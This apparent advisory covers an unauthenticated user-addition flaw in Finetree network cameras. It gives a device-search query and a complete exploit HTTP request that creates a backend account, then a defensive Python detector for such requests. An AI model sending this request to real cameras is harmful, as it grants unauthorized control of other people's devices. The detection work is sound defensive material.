Finetree 5MP camera user_pop.php arbitrary user addition vulnerability (CNVD-2021-42372)
Vulnerability Description
The user_pop.php file of the Finetree 5MP camera allows any user to be added without authorization. After adding a user, the attacker can obtain access to the management backend.
Vulnerability Impact
Finetree 5MP
Finetree 3MP
Network asset mapping
app="Finetree-5MP-Network-Camera"
Vulnerability reproduction
Login page
Vulnerable file: user_pop.php
POST /quicksetup/user_update.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fn4qnpv5c8a2jgvf53vs1gufm6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

method=add&user=admin1234&pwd=admin1234&group=2&ptz_enable=0
A return of 200 means the user was added successfully; a return of 804 means the user already exists. The added account can then be used to log in to the management backend.
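For defenders, the request shape above can be matched in captured traffic or reverse-proxy logs. The following is an added example, not code from the original post or from the vendor; the function names and the sample requests are constructed for illustration, and only the endpoint path and the `method`, `user` and `group` parameters come from the request shown on this page.

```python
import re
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/quicksetup/user_update.php"  # endpoint from the request on this page

def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, headers and form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Normalise so encoded, doubled-slash or mixed-case paths still match.
    path = re.sub(r"/+", "/", unquote(path)).lower()
    # Parameters may arrive in the query string or the body; merge both.
    fields = parse_qs(query, keep_blank_values=True)
    for key, values in parse_qs(body.strip(), keep_blank_values=True).items():
        fields.setdefault(key, []).extend(values)
    return {"method": method.upper(), "path": path, "headers": headers, "fields": fields}

def detect_user_add(raw):
    """Return a finding dict if the request asks the endpoint to add a user, else None."""
    try:
        req = parse_request(raw)
    except ValueError:
        return None
    if req["path"] != TARGET_PATH:
        return None
    if "add" not in [m.lower() for m in req["fields"].get("method", [])]:
        return None
    return {"host": req["headers"].get("host", ""),
            "new_user": req["fields"].get("user", [""])[0],
            "group": req["fields"].get("group", [""])[0]}

# Constructed sample requests (192.0.2.0/24 is a documentation range;
# "method=other" is a made-up value used only as a non-matching case).
SAMPLES = [
    "POST /quicksetup/user_update.php HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "method=add&user=testuser&pwd=x&group=2&ptz_enable=0",
    "GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "POST /QuickSetup//user_update.php?method=ADD&user=u2 HTTP/1.1\r\nHost: 192.0.2.11\r\n\r\n",
    "POST /quicksetup/user_update.php HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\nmethod=other",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(detect_user_add(sample))
```

Any finding whose `new_user` does not correspond to an account an administrator created deliberately is worth comparing against the camera's current user list.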
This post is licensed under CC BY 4.0 by the author.